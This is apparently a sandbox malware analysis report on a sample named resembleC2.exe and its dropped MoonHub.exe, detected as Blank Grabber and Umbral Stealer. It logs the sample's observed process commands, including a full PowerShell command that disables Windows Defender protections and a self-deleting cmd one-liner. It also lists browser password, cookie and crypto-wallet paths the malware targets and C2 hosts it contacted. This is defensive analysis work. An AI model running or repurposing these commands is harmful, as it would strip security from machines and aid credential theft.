                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\AppData\Local\Temp\MoonHub.exe" && pauseJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2Jump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeQueries volume information: C:\Users\user\Desktop\resembleC2.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MoonHub.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Users\user\Desktop\resembleC2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Modifies the hosts file
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: 6z2guuz0ldkdgc1o.exe, 00000002.00000002.3343656728.0000000001651000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Blank Grabber
                            Source: Yara matchFile source: 0.2.resembleC2.exe.13020e48.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.MoonHub.exe.156585b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.resembleC2.exe.13020e48.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: resembleC2.exe PID: 1124, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MoonHub.exe PID: 1784, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, type: DROPPED
                            Yara detected Umbral Stealer
                            Source: Yara matchFile source: 0.2.resembleC2.exe.13020e48.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.MoonHub.exe.156585b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.resembleC2.exe.13020e48.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: resembleC2.exe PID: 1124, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MoonHub.exe PID: 1784, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, type: DROPPED
                            Found many strings related to Crypto-Wallets (likely being stolen)
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AA2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AA2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AA2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keystore
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.logJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                            Source: Yara matchFile source: Process Memory Space: resembleC2.exe PID: 1124, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MoonHub.exe PID: 1784, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected Blank Grabber
                            Source: Yara matchFile source: 0.2.resembleC2.exe.13020e48.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.MoonHub.exe.156585b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.resembleC2.exe.13020e48.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: resembleC2.exe PID: 1124, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MoonHub.exe PID: 1784, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, type: DROPPED
                            Yara detected Umbral Stealer
                            Source: Yara matchFile source: 0.2.resembleC2.exe.13020e48.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.MoonHub.exe.156585b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.resembleC2.exe.13020e48.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: resembleC2.exe PID: 1124, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MoonHub.exe PID: 1784, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            File and Directory Permissions Modification                            		1
                            OS Credential Dumping                            		1
                            File and Directory Discovery                            		Remote Services1
                            Archive Collected Data                            		3
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts11
                            Command and Scripting Interpreter                            		12
                            Registry Run Keys / Startup Folder                            		11
                            Process Injection                            		21
                            Disable or Modify Tools                            		LSASS Memory223
                            System Information Discovery                            		Remote Desktop Protocol2
                            Data from Local System                            		21
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            PowerShell                            		Logon Script (Windows)12
                            Registry Run Keys / Startup Folder                            		2
                            Obfuscated Files or Information                            		Security Account Manager1
                            Query Registry                            		SMB/Windows Admin SharesData from Network Shared Drive1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                            Software Packing                            		NTDS541
                            Security Software Discovery                            		Distributed Component Object ModelInput Capture4
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Timestomp                            		LSA Secrets1
                            Process Discovery                            		SSHKeylogging15
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            DLL Side-Loading                            		Cached Domain Credentials351
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                            Masquerading                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job351
                            Virtualization/Sandbox Evasion                            		Proc Filesystem11
                            Remote System Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                            Process Injection                            		/etc/passwd and /etc/shadow11
                            System Network Configuration Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589390 Sample: resembleC2.exe Startdate: 12/01/2025 Architecture: WINDOWS Score: 100 61 ip-api.com 2->61 63 discord.com 2->63 65 2 other IPs or domains 2->65 91 Suricata IDS alerts for network traffic 2->91 93 Found malware configuration 2->93 95 Malicious sample detected (through community Yara rule) 2->95 97 15 other signatures 2->97 9 resembleC2.exe 3 5 2->9         started        13 OpenWith.exe 18 9 2->13         started        signatures3 process4 file5 53 C:\Users\user\AppData\Local\...\MoonHub.exe, PE32 9->53 dropped 55 C:\Users\user\...\6z2guuz0ldkdgc1o.exe, PE32+ 9->55 dropped 57 C:\Users\user\AppData\Local\...\resemble.py, Python 9->57 dropped 59 C:\Users\user\AppData\...\resembleC2.exe.log, CSV 9->59 dropped 103 Found many strings related to Crypto-Wallets (likely being stolen) 9->103 15 MoonHub.exe 15 15 9->15         started        20 6z2guuz0ldkdgc1o.exe 2 9->20         started        signatures6 process7 dnsIp8 67 ip-api.com 208.95.112.1, 49709, 49947, 80 TUT-ASUS United States 15->67 69 discord.com 162.159.135.232, 443, 50018, 50020 CLOUDFLARENETUS United States 15->69 49 C:\ProgramData\Microsoft\...\gqnbO.scr, PE32 15->49 dropped 51 C:\Windows\System32\drivers\etc\hosts, ASCII 15->51 dropped 75 Antivirus detection for dropped file 15->75 77 Multi AV Scanner detection for dropped file 15->77 79 Suspicious powershell command line found 15->79 89 8 other signatures 15->89 22 powershell.exe 15->22         started        25 cmd.exe 15->25         started        27 WMIC.exe 1 15->27         started        29 9 other processes 15->29 71 0.tcp.eu.ngrok.io 18.153.198.123, 11057, 49704, 49708 AMAZON-02US United States 20->71 73 3.78.28.71, 11057, 50024, 50025 AMAZON-02US United States 20->73 81 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->81 83 Machine Learning detection for dropped file 20->83 85 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 20->85 87 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 20->87 file9 signatures10 process11 signatures12 99 Loading BitLocker PowerShell Module 22->99 31 conhost.exe 22->31         started        33 WmiPrvSE.exe 22->33         started        101 Uses ping.exe to check the status of other devices and networks 25->101 35 conhost.exe 25->35         started        37 PING.EXE 25->37         started        39 conhost.exe 27->39         started        41 conhost.exe 29->41         started        43 conhost.exe 29->43         started        45 conhost.exe 29->45         started        47 6 other processes 29->47 process13

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            resembleC2.exe58%ReversingLabsByteCode-MSIL.Trojan.XWormRAT
                            resembleC2.exe58%VirustotalBrowse
                            resembleC2.exe100%AviraTR/Dropper.Gen
